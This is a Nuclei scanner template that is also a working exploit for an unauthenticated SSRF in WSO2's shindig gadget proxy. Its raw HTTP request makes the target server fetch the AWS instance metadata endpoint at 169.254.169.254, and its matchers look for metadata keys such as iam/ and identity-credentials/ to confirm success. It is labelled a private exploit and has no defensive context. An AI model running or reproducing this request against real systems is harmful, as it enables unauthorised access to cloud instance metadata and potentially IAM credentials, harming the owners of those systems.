id: WSO2

info:
  name: WSO2 SSRF
  author: Amnotacat
  severity: critical
  description: Unauthenticated SSRF
  reference: Does it matter :)
  tags: tags

requests:
- raw:
  - |+
    GET /shindig/gadgets/proxy?container=default&gadget=http://169.254.169.254/latest/meta-data/&debug=1&nocache=1&html_tag_context=link&url=http://169.254.169.254/latest/meta-data HTTP/1.1
    Host: {{Hostname}}
    Cookie: JSESSIONID=BF7F1345328EE0D0D29C65AAE8AB5A91; requestedURI=../../admin
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Private-Exploit: By Amnotacat
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: none
    Sec-Fetch-User: ?1
    Te: trailers
    Connection: close


  matchers-condition: and
  matchers:
  - type: word
    part: body
    condition: or
    words:
    - ami-id
    - ami-launch-index
    - ami-manifest-path
    - block-device-mapping/
    - events/
    - hostname
    - iam/
    - identity-credentials/
    - instance-action
    - instance-id
    - instance-life-cycle
    - instance-type
    - local-hostname
    - local-ipv4
    - mac
    - metrics/
    - network/
    - placement/
    - profile
    - public-keys/
    - reservation-id
    - security-groups
    - services/
  - type: status
    status:
    - 200
